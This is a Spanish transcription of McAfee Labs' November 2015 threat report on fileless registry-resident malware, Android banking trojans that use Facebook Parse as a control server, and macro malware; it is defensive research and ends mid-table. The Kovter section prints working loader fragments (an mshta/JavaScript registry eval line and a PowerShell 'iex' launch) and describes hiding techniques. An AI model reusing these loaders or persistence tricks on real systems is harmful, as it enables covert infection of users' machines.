Informe sobre amenazas de McAfee Labs Noviembre de 2015
Transcripción
Informe sobre amenazas de McAfee Labs Noviembre de 2015
Informe Informe sobre amenazas de McAfee Labs Noviembre de 2015 McAfee Labs contabiliza 327 nuevas amenazas cada minuto, o más de 5 cada segundo. Acerca de McAfee Labs Introducción McAfee Labs es uno de los líderes mundiales en investigación e información sobre amenazas, e innovación en ciberseguridad. Gracias a la información que recibe de millones de sensores situados en los principales vectores de amenazas: archivos, la Web, la mensajería y las redes, McAfee Labs proporciona información sobre amenazas en tiempo real, análisis críticos y opiniones de expertos que permiten mejorar la protección y reducir los riesgos. En McAfee Labs hemos vivido un otoño de máxima actividad. McAfee forma ahora parte de Intel Security. www.mcafee.com/es/mcafee-labs.aspx Siga a McAfee Labs En octubre, publicamos el informe El comercio clandestino de datos, en el que se explica qué ocurre con los datos robados después de un ataque y se detallan algunos de los muchos métodos que emplean los ciberladrones para rentabilizar la información que han robado. Además, el informe se ilustra con numerosos ejemplos sobre cómo son estos mercados y documenta el valor asociado a determinados tipos de datos robados. En noviembre, publicamos el informe de predicciones sobre amenazas para 2016 de McAfee Labs. En ese documento examinamos el futuro desde dos perspectivas diferentes. ■■ ■■ Por un lado, entrevistamos a 21 personalidades destacadas de Intel Security que han compartido con nosotros su opinión sobre el futuro de las ciberamenazas, así como su visión sobre la respuesta que puede dar el sector de la seguridad en los próximos cinco años. Les invitamos a que miraran al horizonte para predecir la evolución de los autores de las amenazas, de sus comportamientos y objetivos, así como la respuesta del sector desde el momento actual hasta 2020. Además, aportamos nuestras previsiones concretas sobre cuál será la actividad de las amenazas en 2016. Entre ellas, incluimos el ransomware, los ataques dirigidos a automóviles o a infraestructuras críticas, o el almacenamiento y la venta de datos robados. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 2 Casi al mismo tiempo, participamos en la elaboración de un informe de la Cyber Threat Alliance, un grupo de proveedores líderes de soluciones de ciberseguridad —entre los que se encuentra Intel Security— que se han unido con el fin de compartir nuevos datos sobre amenazas en interés de todos sus clientes. Lucrative Ransomware Attacks: Analysis of the CryptoWall Version 3 Threat (Ataques de ramsomware lucrativos: el análisis de la amenaza CryptoWall versión 3) es el resultado de meses de un trabajo conjunto de investigación técnica de Intel Security, Symantec, Palo Alto Networks y Fortinet. El informe disecciona la familia de la versión 3 del ransomware CryptoWall, que ha reportado a los delincuentes más de 325 millones de dólares en pagos a rescates. Todos los miembros de la alianza han puesto en común la información de amenazas, tácticas e indicadores detallados en el informe y han compartido estos datos con la comunidad de código abierto. Creemos que el intercambio de información es esencial en la industria de la seguridad. Al mismo tiempo, hemos celebrado cinco sesiones temáticas; dos sesiones técnicas de perfeccionamiento y tres sesiones "TurboTalk" en la conferencia de seguridad FOCUS 15 de Intel Security. En las presentaciones de McAfee Labs se han tratado temas tan variados como las tendencias de los ataques avanzados o los desmantelamientos llevados a cabo por las fuerzas de seguridad internacionales con la ayuda de McAfee Labs. Y en otras noticias... Además de la ingente cantidad de investigaciones llevadas a cabo por McAfee Labs, desarrollamos también la tecnología base que forma parte de los productos de Intel Security. Tenemos el placer de comunicar que en unas pruebas recientes llevadas a cabo por terceros, nuestros productos de seguridad de endpoints para empresas han obtenido la máxima calificación hasta el momento. Además, la puntuación en cuanto a protección ha sido perfecta. A estos resultados han contribuido las mejoras continuas en McAfee GTI (cuya información sobre amenazas consumen los productos de seguridad de endpoints para empresas) y la optimización del rendimiento de los archivos DAT. ¡Nuestro reconocimiento al equipo de desarrollo de McAfee Labs! En McAfee Global Threat Intelligence seguimos aprendiendo sobre los datos y el tráfico. El panel en la nube de McAfee GTI nos permite ver y analizar los patrones de ataque del mundo real, lo que sirve después para mejorar la protección de los clientes. Dicha información ofrece una idea del volumen de los ataques que sufren nuestros clientes. Durante el 3.er trimestre, estos fueron los volúmenes registrados: ■■ ■■ Y ahora comenzamos la temporada navideña con la publicación del informe de McAfee Labs sobre amenazas de noviembre de 2015. En este informe sobre amenazas trimestral, destacamos tres temas: ■■ ■■ ■■ La aparición de una nueva generación de malware sin archivos, que sortea las medidas de detección ocultándose en el registro de Microsoft Windows y eliminando del sistema de archivos todo rastro de infección. Cómo las malas prácticas de codificación para la seguridad en la nube de las aplicaciones móviles —por ejemplo, el incumplimiento de las instrucciones del proveedor de servicios de back-end— pueden poner en riesgo los datos de los usuarios en la nube. La reaparición del malware basado en macros, fundamentalmente a través de sofisticadas campañas de spam y macros inteligentes que permanecen ocultas aun después de haber descargado sus cargas útiles. Naturalmente, acompañamos estos tres temas con nuestras habituales estadísticas de las amenazas del trimestre. Comparta este informe ■■ ■■ ■■ McAfee GTI recibió de media 44 500 millones de consultas al día. Cada hora se realizaron más de 7,4 millones de intentos (a través del correo electrónico, búsquedas en el navegador, etc.) para convencer a nuestros clientes de que se conectaran a URL peligrosas. Cada hora las redes de nuestros clientes estuvieron expuestas a más de 3,5 millones de archivos infectados. Cada hora, además, intentaron instalarse o iniciarse 7,4 millones de programas potencialmente no deseados. Cada hora nuestros clientes realizaron 2,2 millones de intentos de conexión a direcciones IP peligrosas o esas direcciones intentaron conectarse a las redes de nuestros clientes. A través de las encuestas acerca de nuestro informe sobre amenazas seguimos recibiendo opiniones de nuestros lectores, que son de gran utilidad para nosotros. Si desea transmitirnos su opinión sobre este informe, haga clic aquí para rellenar un cuestionario que le llevará apenas cinco minutos. —Vincent Weafer, Vicepresidente primero, McAfee Labs Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 3 Índice Informe de McAfee Labs sobre amenazas Noviembre de 2015 En la investigación y redacción de este informe han participado: Carlos Castillo Diwakar Dinkar Paula Greve Suriya Natarajan François Paget Eric Peterson Arun Pradeep Avelino Rico Craig Schmugar Rakesh Sharma Rick Simon Dan Sommer Bing Sun Chong Xu Resumen ejecutivo 5 Temas principales 7 El malware sin archivos, cada vez más escurridizo 8 Los troyanos bancarios móviles atacan en la nube 16 El regreso del malware basado en macros 34 Estadísticas sobre amenazas 48 Resumen ejecutivo El malware sin archivos, cada vez más escurridizo El malware sin archivos elude la detección a base de reducir o eliminar el almacenamiento de archivos binarios en disco. El más reciente no deja ningún rastro en el disco, lo que dificulta su detección. En los últimos años, los creadores de malware han investigado técnicas nuevas que les permitan eludir la detección permaneciendo en las capas más profundas del sistema. También han complicado la detección mediante el endurecimiento de los ataques con técnicas como el polimorfismo, la implantación de órganos de vigilancia, la revocación de permisos y otros métodos. Además, últimamente los creadores diseñan el malware específicamente de manera que pueda utilizar funciones tales como el Instrumental de administración de Windows (WMI, Windows Management Instrumentation) y Windows PowerShell, con el fin de lanzar ataques sin guardar ningún archivo en el disco. Las infecciones residentes en memoria, que no utilizan archivos, se conocen en el sector de la seguridad desde hace mucho tiempo. Antes las infecciones siempre depositaban un pequeño archivo binario en algún lugar del disco, sin embargo, las nuevas técnicas de evasión que emplea el malware sin archivos — por ejemplo, Kovter, Powelike y XswKit— no dejan rastro en el disco, por lo que su detección, que en general se basa precisamente en buscar archivos estáticos en el disco, resulta más difícil. Los troyanos bancarios móviles atacan en la nube Algunos desarrolladores de aplicaciones móviles no siguen las directrices de seguridad de sus proveedores de servicios de back-end, lo que puede dejar desprotegida la información de los clientes ante un ataque. La seguridad del back-end es con frecuencia insuficiente, tanto en aplicaciones móviles legítimas como en las portadoras de malware. Los desarrolladores de aplicaciones móviles dedican la mayor parte de sus recursos a definir el comportamiento de la aplicación ante el usuario y dejan a los proveedores de servicios de back-end la gestión de la información almacenada en la nube. Si bien es cierto que la mayoría de estos proveedores ofrecen funciones de seguridad para proteger los datos almacenados en sus infraestructuras, McAfee Labs, en colaboración con terceros, ha descubierto que la implementación y la configuración predeterminadas de estos servicios son a menudo inseguras, lo que podría permitir el acceso no autorizado a los datos almacenados en la nube. Con ayuda de McAfee Labs, Siegfried Rasthofer de la Technische Universität de Darmstadt y Eric Bodden de Fraunhofer SIT investigaron a tres importantes proveedores de servicios de back-end y, tras analizar cerca de 2 millones de aplicaciones, encontraron 56 millones de conjuntos de datos desprotegidos. Entre ellos había información confidencial, como nombres completos, direcciones de correo electrónico, contraseñas, fotografías, transacciones monetarias e incluso historias médicas, que podía utilizarse, entre otras cosas, para perpetrar robos de identidad, enviar spam por correo electrónico y distribuir malware. También invertimos los papeles y nos aprovechamos de las deficientes prácticas de codificación que utilizaron los delincuentes en la seguridad del back-end. Analizamos 294 817 aplicaciones móviles cargadas de malware y encontramos 16 que no contaban con la protección suficiente en el back-end. Después examinamos a fondo dos troyanos bancarios móviles —Android/OpFake y Android/Marry— para averiguar cómo actúan para robar dinero y datos. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 5 El regreso del malware basado en macros Tras un largo paréntesis, ha regresado el malware basado en macros. Las campañas eficaces distribuyen malware nuevo e inteligente incluido en los documentos adjuntos a sofisticados mensajes de spam. Las macros permanecen ocultas incluso después de haber descargado su carga útil. En los años 90, los programas de malware basado en macros, como Melissa y WM.Concept, tuvieron bastante éxito hasta que los desarrolladores de software, sobre todo Microsoft, tomaron medidas para reducir su efectividad. Ahora, tras varios años de decadencia, se observa un repunte de las macros maliciosas. Aunque los usuarios particulares no se ven muy afectados por esta amenaza, ya que hacen un uso mínimo de las macros, las organizaciones de mayor tamaño sí las emplean con frecuencia, ya que son programas fáciles de desarrollar y útiles para las tareas repetitivas. Los desarrolladores de malware basado en macros emplean técnicas de ingeniería social para que los usuarios de empresas desprevenidos caigan en la trampa. Esta nueva generación de malware de macros entra principalmente en las redes corporativas a través de sofisticadas campañas de spam que hacen uso de la información recopilada mediante ingeniería social para parecer mensajes legítimos. Estas nuevas macros son inteligentes y permanecen ocultas aun después de haber descargado su carga útil. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 6 Temas principales El malware sin archivos, cada vez más escurridizo Los troyanos bancarios móviles atacan en la nube El regreso del malware basado en macros Compartir opinión Temas principales El malware sin archivos, cada vez más escurridizo —Arun Pradeep y Suriya Natarajan Las técnicas de infiltración y persistencia que utiliza el malware cambian constantemente. En los últimos años, los creadores de malware han investigado técnicas nuevas que les permitan eludir la detección permaneciendo en las capas más profundas del sistema. También han complicado la detección mediante el endurecimiento de los ataques con técnicas como el polimorfismo, la implantación de órganos de vigilancia, la revocación de permisos y otros métodos. Además, en los últimos tiempos los creadores diseñan el malware específicamente de manera que pueda utilizar funciones tales como el Instrumental de administración de Windows (WMI, Windows Management Instrumentation) y Windows PowerShell, con el fin de lanzar ataques sin guardar ningún archivo en el disco. Las infecciones sin archivos residentes en memoria se conocen en el sector de la seguridad desde hace mucho tiempo. Aunque en aquel entonces se les dio el nombre de infecciones "sin archivos", siempre depositaban un pequeño archivo binario en algún lugar del disco. Sin embargo, las nuevas técnicas de evasión del malware sin archivos —por ejemplo, Kovter, Powelike y XswKit— no dejan rastro en el disco, por lo que su detección, que en general se basa precisamente en buscar archivos estáticos en el disco, resulta más difícil. El malware sin archivos empezó a extenderse a finales del año 2014 y principios de 2015. En los primeros tres trimestres de 2015, McAfee Labs detectó 74 471 muestras de tres familias destacadas de malware sin archivos. A pesar de que la protección contra algunas de estas nuevas familias ha reducido el número de muestras, el malware persiste. Tendencia del malware sin archivos 20 000 18 000 16 000 14 000 12 000 10 000 8000 6000 4000 2000 0 Ene Feb Mar Abr Mayo Jun 2015 Jul Ago Sep Oct Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 8 Temas principales Tipos de malware sin archivos El malware sin archivos es el que infecta un sistema sin dejar ningún rastro de su ejecución en el disco. Los tres tipos de malware sin archivos más comunes son: ■■ ■■ ■■ Residente en memoria: este tipo de malware utiliza el espacio en memoria de un archivo de Windows legítimo. Carga el código en ese espacio y permanece latente hasta que se reactiva o se accede a él. Aunque la ejecución tiene lugar dentro del espacio legítimo del archivo en la memoria, la inicia o reinicia un archivo físico inactivo. Por consiguiente, este tipo de malware no funciona del todo sin archivos. Rootkits: en este caso el malware sin archivos oculta su presencia detrás de una API de nivel de usuario o kernel. Hay un archivo presente en el disco, pero está en modo oculto. Tampoco este malware funciona del todo sin archivos. Registro de Windows: algunos tipos nuevos de malware sin archivos residen en el Registro del sistema operativo Windows. Los creadores del malware se aprovechan de funciones como la caché de vistas en miniatura de Windows, que almacena imágenes para las miniaturas que se muestran en el Explorador. La caché de vistas en miniatura actúa como mecanismo de persistencia para el malware. Este malware sigue necesitando entrar en el sistema de la víctima a través de un archivo binario estático. La mayoría emplea el correo electrónico como vía de entrada. En cuanto el usuario hace clic en el archivo adjunto, el malware escribe la carga útil completa, una vez cifrada, en un subárbol del Registro de Windows. Después desaparece del sistema autodestruyéndose. Los creadores de malware sin archivos han diseñado ingeniosamente las familias Kovter, Powelike y XswKit para ejecutar ataques desde el Registro de Windows sin utilizar ningún archivo ni dejar ningún rastro en el sistema de archivos. Aunque el entorno que debe llevar a cabo estos ataques se prepara ejecutando código de un archivo, este se autodestruye una vez que el sistema está listo para la operación maliciosa. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 9 Temas principales Diagrama genérico de infección de malware sin archivos Campaña de spam Dropper Sitios web maliciosos Crea Ejecuta el Registro con JavaScript Entrada del Registro de caché de miniaturas Ejecuta Ejecuta Powershell Ejecuta la secuencia de comandos cifrada Carga útil maliciosa El código malicioso se ejecuta en la memoria de procesos legítima Fuente: McAfee Labs, 2015 Técnicas utilizadas para ocultar infecciones sin archivos Kovter y Powelike escriben el código JavaScript y la carga útil cifrada en un subárbol del Registro y eliminan el permiso de usuario de las claves correspondientes para ocultarse ante los productos de seguridad y las funciones de verificación de acceso del usuario. Esta familia de malware utiliza dos técnicas para ser invisible al usuario: el enmascaramiento y el uso de un carácter nulo. Enmascaramiento: con esta técnica, el malware sin archivos oculta las entradas del Registro ya sea revocando permisos en la lista de control de acceso (ACL) o añadiendo un carácter nulo al nombre de valor en el Registro. Una ACL es una lista de protecciones de seguridad que se aplica a un objeto. Un objeto puede ser un archivo, un proceso, un evento o cualquier otra cosa que tenga un descriptor de seguridad. En este caso, la entrada del Registro es el objeto cuyos permisos revoca el malware en la ACL, con lo que impide que el usuario se percate del rastro malicioso en el Registro. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 10 Temas principales Uso de un carácter nulo en un nombre de valor del Registro: una técnica sencilla pero eficaz que utilizan los creadores de malware y que consiste en incluir uno o varios caracteres nulos en el nombre de valor del Registro. El Editor del Registro de Windows no puede mostrar entradas —clave, datos o valor— que contengan caracteres nulos. El malware escribe todo el archivo cifrado en una clave cuyo nombre comienza por un carácter nulo. Cuando se accede a la clave que ha creado el malware, el Editor del Registro muestra el siguiente mensaje de error: Error cuando se accede a una clave de registro que contiene un carácter nulo. Ejecución de malware sin archivos Los creadores de malware sin archivos han elegido cuidadosamente aplicaciones legítimas del sistema operativo Windows para ejecutar sus archivos binarios. Dos de estas aplicaciones son Instrumental de administración de Windows (WMI, Windows Management Instrumentation) y PowerShell: Instrumental de administración de Windows: es la implementación de Microsoft de Web-Based Enterprise Management (WBEM), una iniciativa para desarrollar una tecnología estándar de acceso a la información de gestión en entornos empresariales. El malware sin archivos puede emplear esta utilidad de Microsoft para ejecutar código JavaScript malicioso. PowerShell: Windows PowerShell es un marco para la administración de configuración y automatización de tareas de Microsoft, formado por un shell de línea de comandos y el correspondiente lenguaje de secuencia de comandos, creado en .NET Framework. Se escribe en el Registro una carga útil maliciosa cifrada con Base64, que después se ejecuta con una secuencia de PowerShell. A continuación se muestra descifrada una función de malware sin archivos codificada en una clave del Registro que llama al ejecutable de PowerShell para procesar el código cifrado de la carga útil. Ly9oS6=TN25.Run(“C:\\Windows\\System32\\WindowsPowerShell\\ v1.0\\powershell.exe iex $env:csnvjgc”,0,1) Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 11 Temas principales McAfee Labs analiza Kovter Las familias de malware sin archivos habituales utilizan distintas claves del Registro autoejecutables para iniciar la infección y almacenar toda su carga útil en claves personalizadas, normalmente ocultas al usuario. La mayoría de las variantes de este tipo de malware tienen como fin inyectar código de búsqueda, efectuar fraudes del clic e identificar información del sistema. El principal instalador de Kovter crea un entorno para la infección completa. En el Registro se crea una clave Run con código JavaScript y un nombre de valor que contiene un carácter nulo. El usuario no puede acceder a nombres de valor que contengan caracteres nulos. Nombre de valor del registro que contiene un carácter nulo. El valor de la clave Run señala a otra clave del Registro que contiene la secuencia de comandos maliciosa para cargar el órgano de vigilancia y la carga útil. Este es el valor de la clave del Registro que señala a otra clave de la entrada HKCU\Software. mshta javascript:wnd1w7pRy=”X”;yg2=new%20 ActiveXObject(“WScript.Shell”);COlM2JWez=”pKiLSI”;Vr0AD6=yg2. RegRead(“HKCU\\software\\3cf540da\\ e925fae2”);YJa6FFTM=”0nl0”;eval(Vr0AD6);ASC7rr9Oj=”hAzrr”; En la siguiente imagen, el código JavaScript de la clave de Registro HKCU\Software está codificado y alterado. Carga útil cifrada y código de vigilancia escrito en el registro. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 12 Temas principales El siguiente código JavaScript es el resultado de una primera clarificación del código alterado; también contiene código shell con codificación Base64. Código shell con codificación Base64. Al descodificar el código shell en Base64 aparece la secuencia de comandos de PowerShell que ejecuta el código malicioso y la secuencia de comandos del órgano de vigilancia. Secuencia de comandos de PowerShell con codificación Base64. Ejecución de PowerShell La secuencia de comandos de PowerShell ejecuta el código malicioso en la memoria de los archivos del sistema legítimos para que pueda permanecer en el sistema sin ser detectado. ■■ Regsvr32.exe ■■ Svchost.exe ■■ Dllhost.exe Después de ejecutar el código de PowerShell, el malware establece conexión con un servidor de control. ■■ hxxp://185.5.250.230/upload.php A continuación, reúne gran cantidad de información de la máquina host y realiza una serie de acciones. ■■ ■■ Recopila información del sistema, como la versión del sistema operativo, Service Pack y arquitectura (chipset de 32 o 64 bits). Comprueba si están presentes .Net Framework, Adobe Flash Player y la última versión del navegador. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 13 Temas principales Información del sistema infectado reunida por Kovter Nombre Valor Descripción Mode 1 Acción que debe realizarse en el host UID 5BD39AA1CAF61D76 ID de usuario OS Win 7, SP1 IL:3 Versión del SO con Service Pack OS bits x32 Arquitectura del chipset V 2.0.3.5 Versión del malware aff_id 610 ID del nodo afectado Oslang ENU Idioma del SO GMT GMT +05:30 Zona horaria Threads 0 Número de subprocesos en ejecución Online 355 Número de infecciones activas Total RAM 2047 Capacidad de la memoria RAM Load RAM 0 RAM que ha utilizado el malware Free RAM 1404 Espacio libre disponible en la memoria RAM CPU Load 7 Carga de la CPU Antispyware Windows Defender Programa de seguridad instalado El código que se ejecuta en la memoria analiza los recursos del sistema y recibe información dinámica del servidor de control, lo que le permite manipular el ataque sin afectar al usuario y sin ser detectado. Cuantos más recursos o potencia tiene la máquina, más tráfico se aprecia en la red. Kovter también despliega técnicas para eludir a los investigadores de seguridad. Determina si el host es una máquina virtual o si tiene productos antimalware y herramientas de supervisión. Entre la información que reúne sobre el host cabe mencionar: ■■ &antivirus=McAfee VirusScan Enterprise ■■ AntiWireShark ■■ &antidetect=AntiVMware Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 14 Temas principales El malware sin archivos comprueba la presencia de aplicaciones específicas. Si no las encuentra, las descarga y las instala en el sistema de la víctima. Descubra cómo puede protegerle Intel Security frente a esta amenaza. ■■ .NET Framework ■■ Adobe Flash Player ■■ Última versión de Internet Explorer Estas aplicaciones son necesarias para poder acceder a sitios web con anuncios basados en Flash y hacer clic en ellos sin ser detectado. Una vez evaluado el sistema, Kovter prepara un navegador para rastrear todas las páginas de un sitio web y hacer clic en todos los anuncios. El servidor de control abre sobre la marcha los sitios que albergan esos anuncios y hace clic en ellos de forma aleatoria. Llegado este punto, el sistema infectado se ha transformado en un "bot de clics" que hace continuamente clics fraudulentos en anuncios. Ejecución del fraude de clics Kovter contiene cadenas de búsqueda codificadas que llenan las páginas web donde se encuentran los anuncios en los que el malware hace clic de forma aleatoria gracias al código incorporado. El fraude de clics es muy lucrativo para los agresores, que se aprovechan del sistema publicitario de pago por clic que consiste en que los anunciantes pagan al editor del sitio web cada vez que se hace clic en un anuncio. Cuantos más clics, más se dinero ganan los delincuentes. Pero estos no se detienen aquí: además parecen haber incorporado prácticas de ransomware. Algunas de las variantes de Kovter analizadas por McAfee Labs descargaron otras cargas útiles pertenecientes a la familia CryptoWall. En Kovter no hemos observado robo de información. Aparentemente, su único objetivo es infiltrarse en el sistema de la víctima y transformarlo en un bot de clics. Detección y tecnología de seguridad En general, el malware sin archivos no es detectable a partir de archivos, carpetas u otros elementos estáticos del sistema atacado, ya que no deja rastro permanente. Además, con este malware no sirve la detección basada en procesos, puesto que en la memoria no se ejecutan procesos independientes. La detección basada en el acceso al Registro a nivel de usuario también puede resultar inútil porque normalmente este acceso se revoca con el uso de caracteres nulos en los valores de las claves del Registro. Asimismo, es posible que el cifrado de los valores de las claves del Registro sea dinámico, por lo que tampoco surte efecto la detección estática de claves de Registro infectadas. Como el blanco de la agresión no es ninguna aplicación o vulnerabilidad específica, las actualizaciones de Windows o los parches de aplicaciones no impiden que los usuarios sean víctimas de este tipo de ataque. Si tenemos en cuenta que la fuente de la infección suele ser el correo electrónico o los sitios web maliciosos, dos de las mejores defensas son la navegación segura y un uso inteligente del correo electrónico. Las tecnologías de seguridad del correo electrónico y la Web ayudan a proteger a los usuarios en el vector inicial de ataque del malware sin archivos, que siempre incluye un archivo adjunto. Algunas tecnologías de seguridad para endpoints son suficientemente inteligentes para detectar este tipo de malware. Por último, también parece prometedora la tecnología basada en el comportamiento. Para obtener más información sobre cómo detectan el malware sin archivos los productos de Intel Security, haga clic aquí. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 15 Temas principales Los troyanos bancarios móviles atacan en la nube —Carlos Castillo Casi todas las aplicaciones móviles están conectadas a Internet, lo que incrementa la disponibilidad de los datos entre dispositivos y plataformas. Cuando un dispositivo móvil se estropea o el usuario lo cambia por otro, normalmente los datos de las aplicaciones pueden recuperarse desde la nube. Sin embargo, almacenar y administrar los datos de aplicaciones móviles de manera remota puede llevar tiempo y resultar costoso. En lugar de centrarse únicamente en el desarrollo de la aplicación propiamente dicha, los desarrolladores deben dedicar tiempo y dinero a crear y probar el "back-end" de la aplicación en la nube, lo cual requiere conocimientos específicos de los lenguajes de bases de datos y servidores. Datos personales captados por aplicaciones móviles y almacenados en el "back-end". Fuente: https://www.sit.fraunhofer.de/fileadmin/bilder/presse/appdatathreat_pressebild.jpg Como respuesta, empresas que operan en Internet como Amazon, Google y Facebook ofrecen servicios de back-end listos para usar, fáciles de implementar y con mantenimiento incluido que formalmente se conocen como Backend-asa-Service (BaaS). Estos servicios proporcionan almacenamiento y administración de datos seguros para aplicaciones móviles y web. Aunque la mayoría de los proveedores de BaaS ofrecen funciones de seguridad para proteger los datos almacenados en su infraestructura, McAfee Labs, en colaboración con terceros, ha descubierto que la implementación y la configuración de esos servicios, cuando corren a cargo de los desarrolladores de aplicaciones móviles, son a menudo inseguras, lo que podría permitir el acceso no autorizado a los datos almacenados en la nube. Comparta este informe En marzo, Siegfried Rasthofer de la Technische Universität de Darmstadt y Eric Bodden de Fraunhofer SIT, con ayuda de McAfee Labs, investigaron dos millones de aplicaciones móviles conectadas a tres importantes proveedores de BaaS (Facebook Parse, CloudMine y Amazon AWS) y hallaron 56 millones de conjuntos de datos desprotegidos. Los investigadores accedieron a bases de datos en la nube de varias aplicaciones legítimas y descubrieron información confidencial, como nombres completos, direcciones de correo electrónico, contraseñas, fotografías, transacciones monetarias e incluso historias médicas, que podía utilizarse, entre otras cosas, para perpetrar robos de identidad, enviar spam y distribuir malware. (En lugar de publicar el nombre de los desarrolladores de estas aplicaciones, los investigadores se comunicaron con ellos en privado para proteger la información de los clientes). Aunque los proveedores de BaaS documentan cómo implementar sus servicios de forma segura, algunos desarrolladores de aplicaciones no siguieron las directrices de seguridad disponibles. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 16 Temas principales Por ejemplo, una de las recomendaciones más importantes de los proveedores de BaaS es utilizar canales diferentes, como interfaces web administrativas, para realizar cualquier manipulación (por ejemplo, leer, actualizar o borrar registros), y no emplear la propia aplicación. En caso contrario, el acceso a los datos solo se protege de forma predeterminada con una clave "secreta" incorporada a la aplicación cuando se le suministra al usuario. Por lo tanto, está disponible para cualquier persona con un mínimo de conocimientos técnicos capaz de extraerla descompilando la aplicación o realizando una búsqueda de cadenas. Las claves de usuario codificadas en aplicaciones para móviles pueden ser interceptadas, por lo que la manipulación de datos en la nube directamente desde las apps puede conllevar riesgos. Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Los troyanos bancarios móviles no utilizan el BaaS de Facebook Parse de forma segura Si las aplicaciones legítimas no siguen las directrices de seguridad de los proveedores de BaaS, con lo que ponen en peligro millones de registros de clientes, ¿qué ocurre con las aplicaciones móviles portadoras de malware, y que utilizan a un proveedor de BaaS para sus servicios de back-end? ¿Es posible que tampoco sigan prácticas de seguridad sólidas y se expongan por tanto al escrutinio de los investigadores de amenazas? En julio, en colaboración con Rasthofer y Bodden, McAfee Labs analizó 294 817 aplicaciones móviles cargadas de malware y descubrió que 16 de ellas se conectaban a instancias de BaaS vulnerables implementadas en Facebook Parse. McAfee Labs observó que nueve de las aplicaciones podían acceder a tablas de base de datos en la nube (NewTasks, SmsReceiver y TaskManager), Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 17 Temas principales lo que llevó a los investigadores a la conclusión de que el BaaS se utilizaba también como servidor de control. Detectamos cinco cuentas afectadas en Facebook Parse; las utilizaban dos familias de troyanos bancarios móviles relacionadas entre sí: Android/OpFake y Android/Marry. Smishing: ataques de phishing a través de mensajes SMS. Para comprender cómo utilizan los servicios BaaS estas amenazas y qué tipo de información se almacena en la nube, descompilamos y analizamos estadísticamente una variante de la familia de malware Android/OpFake, menos compleja. La aplicación de malware, probablemente distribuida mediante ataques de smishing, simula ser un instalador (Установка) de la aplicación rusa legítima de mensajería instantánea Chat for Friends (Чат для друзей. ДругВокруг, que es legítima: Familia Android/OpFake que simula ser una aplicación rusa de mensajería instantánea. Cuando la aplicación de malware se ejecuta, el usuario ve un mensaje falso que informa de que la aplicación va a descargarse e instalarse en el dispositivo: Mensaje falso que muestra Android/OpFake. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 18 Temas principales Sin embargo, en lugar de hacer lo que indica la interfaz de la aplicación, el malware oculta el icono en la pantalla inicial y pone en marcha un servicio en segundo plano que suscribe el dispositivo a las notificaciones de inserción de Facebook Parse, envía información sobre el dispositivo a Facebook Parse y a servidores de control tradicionales (no BaaS) y programa una alarma del sistema: Suena el teléfono Se inicia el servicio principal Se ejecuta la app Canales: • D-<lddispositivo> • "Everyone" • País (ISO SIM) • "welcome" Se oculta el icono Se guarda localmente la URL del servidor de control principal Suscripción a notificaciones de inserción de Parse Se guarda la información de instalación de Parse • • • • • • • • Finaliza el arranque IMEI País de SIM Operador de SIM Número de teléfono API Número de teléfono Modelo is_worked (verdadero) • worked_task (verdadero) • is_root Fin Se ejecutan tareas asíncronas Envío de información del dispositivo al servidor de control /bn/reg.php Se programa una alarma del sistema • • • • • IMEI País de SIM Número de teléfono Operador de SIM Saldo Se ejecuta el receptor de contenido cada minuto Comportamiento de Android/OpFake cuando se ejecuta la aplicación o se inicia el servicio en segundo plano. Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 19 Temas principales La alarma del sistema se ejecuta cada minuto para comprobar si hay nuevos comandos que ejecutar tanto en el servidor de control tradicional como en la tabla NewTasks de Facebook Parse. Una vez ejecutado el comando, la tarea se almacena en la tabla TaskManager y el registro se actualiza después con la respuesta: Alarma del sistema Ejecución de receptor de contenido Se consulta la tabla NewTasks de Parse por ID de dispositivo Tarea de inserción • • • • • type: de NewTasks task: tipo y argumentos hash: identificador IMEI: id de dispositivo response: vacía IMEI== ID de dispositivo No Fin Sí No Ejecutar nueva tarea Si type== tarea e IMEI== ID de dispositivo Se guarda la tarea ejecutada en la tabla TaskManager Sí Fin Activar/ desactivar Intercept Sí Task== Intercept No Android/OpFake obtiene nuevos comandos desde la tabla de Facebook Parse NewTasks. Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 20 Temas principales Además de la tarea "intercept" (activar/desactivar), Android/OpFake puede ejecutar cualquiera de los comandos siguientes incluidos en la tabla NewTasks o enviados en una notificación de inserción: Comandos Android/OpFake Comando Acción SMS Envía un mensaje de texto al número y con el contenido indicados en el registro de NewTasks. USSD Envía un mensaje USSD con el URI "tel:". URL Abre la URL indicada en el registro de NewTasks utilizando el navegador web predeterminado. New_server Guarda localmente la URL del nuevo servidor de control. Install Descarga a la tarjeta SD un archivo APK de la URL indicada en el registro de NewTasks. Si se ha obtenido acceso root al dispositivo, el malware utilizará privilegios del administrador para instalar subrepticiamente el APK con el comando "pm install" como si fuera una aplicación del sistema. Si no se ha obtenido acceso root al dispositivo, el malware engañará al usuario para que instale la aplicación mediante la interfaz de usuario. Una vez finalizada la tarea, el registro se borra de la tabla NewTasks para evitar que el comando vuelva a ejecutarse. Cuando llega un mensaje SMS, Android/OpFake: ■■ Guarda el mensaje en la tabla SmsReceiver de Facebook Parse. ■■ Envía los datos del mensaje al canal de inserción "T" de Facebook Parse. ■■ Si está activado el indicador "intercept", el malware envía el mensaje (y, si el SMS procede de una empresa como MegaFon, el saldo) al servidor de control tradicional. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 21 Temas principales • • • • from content to: imei type: service/ other • 